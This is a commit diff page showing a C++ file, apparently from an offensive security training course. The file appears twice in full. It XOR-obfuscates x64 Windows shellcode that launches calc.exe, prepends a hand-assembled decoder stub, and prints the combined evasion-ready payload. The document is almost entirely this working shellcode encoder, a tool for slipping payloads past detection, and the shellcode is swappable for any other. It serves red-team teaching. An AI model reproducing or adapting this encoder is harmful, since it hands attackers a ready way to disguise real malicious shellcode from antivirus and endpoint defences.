WKL-Sec · April 24, 2024 15:48
diff --git a/Obfuscation_Stub.cpp b/Obfuscation_Stub.cpp
 # White Knight Labs
 # Offensive Development Course - Shellcode Decoder Stub
 # Author: Stigs

 #include <iostream>
 #include <vector>
 #include <iomanip>
 #include <random>

 // Modified function to apply obfuscation on shellcode using a dynamic XOR value
 void obfuscateBytes(std::vector<char>& data, unsigned char randomXorValue) {
    for (char& byte : data) {
        byte = ~((byte ^ randomXorValue) + 1);
    }
 }

 int main() {
 	
 	std::random_device rd; // Obtain a random number from hardware
    std::mt19937 gen(rd()); // Seed the generator
    std::uniform_int_distribution<> distr(0, 0xFF); // Updated range to 0x00 to 0xFF

    // Generate a random hexadecimal value within the specified range
    unsigned char randomHexValue = static_cast<unsigned char>(distr(gen));
 	
 	// Shellcode Link - Calc - https://www.exploit-db.com/exploits/51634
 	
 std::vector<char> shellcode = {
    '\x48', '\x31', '\xd2', '\x65', '\x48', '\x8b', '\x42', '\x60', '\x48', '\x8b', '\x70', '\x18', '\x48', '\x8b', '\x76', '\x20',
    '\x4c', '\x8b', '\x0e', '\x4d', '\x8b', '\x09', '\x4d', '\x8b', '\x49', '\x20', '\xeb', '\x63', '\x41', '\x8b', '\x49', '\x3c',
    '\x4d', '\x31', '\xff', '\x41', '\xb7', '\x88', '\x4d', '\x01', '\xcf', '\x49', '\x01', '\xcf', '\x45', '\x8b', '\x3f', '\x4d',
    '\x01', '\xcf', '\x41', '\x8b', '\x4f', '\x18', '\x45', '\x8b', '\x77', '\x20', '\x4d', '\x01', '\xce', '\xe3', '\x3f', '\xff',
    '\xc9', '\x48', '\x31', '\xf6', '\x41', '\x8b', '\x34', '\x8e', '\x4c', '\x01', '\xce', '\x48', '\x31', '\xc0', '\x48', '\x31',
    '\xd2', '\xfc', '\xac', '\x84', '\xc0', '\x74', '\x07', '\xc1', '\xca', '\x0d', '\x01', '\xc2', '\xeb', '\xf4', '\x44', '\x39',
    '\xc2', '\x75', '\xda', '\x45', '\x8b', '\x57', '\x24', '\x4d', '\x01', '\xca', '\x41', '\x0f', '\xb7', '\x0c', '\x4a', '\x45',
    '\x8b', '\x5f', '\x1c', '\x4d', '\x01', '\xcb', '\x41', '\x8b', '\x04', '\x8b', '\x4c', '\x01', '\xc8', '\xc3', '\xc3', '\x41',
    '\xb8', '\x98', '\xfe', '\x8a', '\x0e', '\xe8', '\x92', '\xff', '\xff', '\xff', '\x48', '\x31', '\xc9', '\x51', '\x48', '\xb9',
    '\x63', '\x61', '\x6c', '\x63', '\x2e', '\x65', '\x78', '\x65', '\x51', '\x48', '\x8d', '\x0c', '\x24', '\x48', '\x31', '\xd2',
    '\x48', '\xff', '\xc2', '\x48', '\x83', '\xec', '\x28', '\xff', '\xd0'
 };

 	
 	// Apply obfuscation to the shellcode using the random value
    obfuscateBytes(shellcode, randomHexValue);

    // Shellcode size for dynamically updating the decoder stub
    size_t shellcodeSize = shellcode.size();

    // Decoder stub with a placeholder for shellcode size
    std::vector<char> decoderStub = {
        // '\xcc', // INT 3 - Breakpoint - Uncomment if needed
        '\xbe', // Moving to next byte for size placeholder
        static_cast<char>(shellcodeSize & 0xFF), // Least significant byte (LSB) of the size
        static_cast<char>((shellcodeSize >> 8) & 0xFF),
        static_cast<char>((shellcodeSize >> 16) & 0xFF),
        static_cast<char>((shellcodeSize >> 24) & 0xFF), // Most significant byte (MSB) of the size
        // The rest of the decoder stub instructions
        '\x48', '\x8d', '\x3d', '\x16', '\x00', '\x00', '\x00',
        '\x48', '\x85', '\xf6', '\x74', '\x11',
        '\x48', '\xff', '\xce', '\x8a', '\x04', '\x37', '\xf6',
        '\xd0', '\xfe', '\xc8', '\x34', static_cast<char>(randomHexValue), '\x88', '\x04',
        '\x37', '\xeb', '\xea', 
    };

    // Combine the decoder stub with the obfuscated shellcode
    std::vector<char> combinedData = decoderStub;
    combinedData.insert(combinedData.end(), shellcode.begin(), shellcode.end());

    // Print the obfuscated shellcode with the decoder stub
    std::cout << "Obfuscated Shellcode with Decoder Stub: ";
    for (const char& byte : combinedData) {
        std::cout << "\\x" << std::hex << std::setw(2) << std::setfill('0') << (0xFF & static_cast<int>(byte));
    }
    std::cout << std::endl;

    return 0;
 }
	# White Knight Labs
	# Offensive Development Course - Shellcode Decoder Stub
	# Author: Stigs

	#include <iostream>
	#include <vector>
	#include <iomanip>
	#include <random>

	// Modified function to apply obfuscation on shellcode using a dynamic XOR value
	void obfuscateBytes(std::vector<char>& data, unsigned char randomXorValue) {
	for (char& byte : data) {
	byte = ~((byte ^ randomXorValue) + 1);
	}
	}

	int main() {

	std::random_device rd; // Obtain a random number from hardware
	std::mt19937 gen(rd()); // Seed the generator
	std::uniform_int_distribution<> distr(0, 0xFF); // Updated range to 0x00 to 0xFF

	// Generate a random hexadecimal value within the specified range
	unsigned char randomHexValue = static_cast<unsigned char>(distr(gen));

	// Shellcode Link - Calc - https://www.exploit-db.com/exploits/51634

	std::vector<char> shellcode = {
	'\x48', '\x31', '\xd2', '\x65', '\x48', '\x8b', '\x42', '\x60', '\x48', '\x8b', '\x70', '\x18', '\x48', '\x8b', '\x76', '\x20',
	'\x4c', '\x8b', '\x0e', '\x4d', '\x8b', '\x09', '\x4d', '\x8b', '\x49', '\x20', '\xeb', '\x63', '\x41', '\x8b', '\x49', '\x3c',
	'\x4d', '\x31', '\xff', '\x41', '\xb7', '\x88', '\x4d', '\x01', '\xcf', '\x49', '\x01', '\xcf', '\x45', '\x8b', '\x3f', '\x4d',
	'\x01', '\xcf', '\x41', '\x8b', '\x4f', '\x18', '\x45', '\x8b', '\x77', '\x20', '\x4d', '\x01', '\xce', '\xe3', '\x3f', '\xff',
	'\xc9', '\x48', '\x31', '\xf6', '\x41', '\x8b', '\x34', '\x8e', '\x4c', '\x01', '\xce', '\x48', '\x31', '\xc0', '\x48', '\x31',
	'\xd2', '\xfc', '\xac', '\x84', '\xc0', '\x74', '\x07', '\xc1', '\xca', '\x0d', '\x01', '\xc2', '\xeb', '\xf4', '\x44', '\x39',
	'\xc2', '\x75', '\xda', '\x45', '\x8b', '\x57', '\x24', '\x4d', '\x01', '\xca', '\x41', '\x0f', '\xb7', '\x0c', '\x4a', '\x45',
	'\x8b', '\x5f', '\x1c', '\x4d', '\x01', '\xcb', '\x41', '\x8b', '\x04', '\x8b', '\x4c', '\x01', '\xc8', '\xc3', '\xc3', '\x41',
	'\xb8', '\x98', '\xfe', '\x8a', '\x0e', '\xe8', '\x92', '\xff', '\xff', '\xff', '\x48', '\x31', '\xc9', '\x51', '\x48', '\xb9',
	'\x63', '\x61', '\x6c', '\x63', '\x2e', '\x65', '\x78', '\x65', '\x51', '\x48', '\x8d', '\x0c', '\x24', '\x48', '\x31', '\xd2',
	'\x48', '\xff', '\xc2', '\x48', '\x83', '\xec', '\x28', '\xff', '\xd0'
	};


	// Apply obfuscation to the shellcode using the random value
	obfuscateBytes(shellcode, randomHexValue);

	// Shellcode size for dynamically updating the decoder stub
	size_t shellcodeSize = shellcode.size();

	// Decoder stub with a placeholder for shellcode size
	std::vector<char> decoderStub = {
	// '\xcc', // INT 3 - Breakpoint - Uncomment if needed
	'\xbe', // Moving to next byte for size placeholder
	static_cast<char>(shellcodeSize & 0xFF), // Least significant byte (LSB) of the size
	static_cast<char>((shellcodeSize >> 8) & 0xFF),
	static_cast<char>((shellcodeSize >> 16) & 0xFF),
	static_cast<char>((shellcodeSize >> 24) & 0xFF), // Most significant byte (MSB) of the size
	// The rest of the decoder stub instructions
	'\x48', '\x8d', '\x3d', '\x16', '\x00', '\x00', '\x00',
	'\x48', '\x85', '\xf6', '\x74', '\x11',
	'\x48', '\xff', '\xce', '\x8a', '\x04', '\x37', '\xf6',
	'\xd0', '\xfe', '\xc8', '\x34', static_cast<char>(randomHexValue), '\x88', '\x04',
	'\x37', '\xeb', '\xea',
	};

	// Combine the decoder stub with the obfuscated shellcode
	std::vector<char> combinedData = decoderStub;
	combinedData.insert(combinedData.end(), shellcode.begin(), shellcode.end());

	// Print the obfuscated shellcode with the decoder stub
	std::cout << "Obfuscated Shellcode with Decoder Stub: ";
	for (const char& byte : combinedData) {
	std::cout << "\\x" << std::hex << std::setw(2) << std::setfill('0') << (0xFF & static_cast<int>(byte));
	}
	std::cout << std::endl;

	return 0;
	}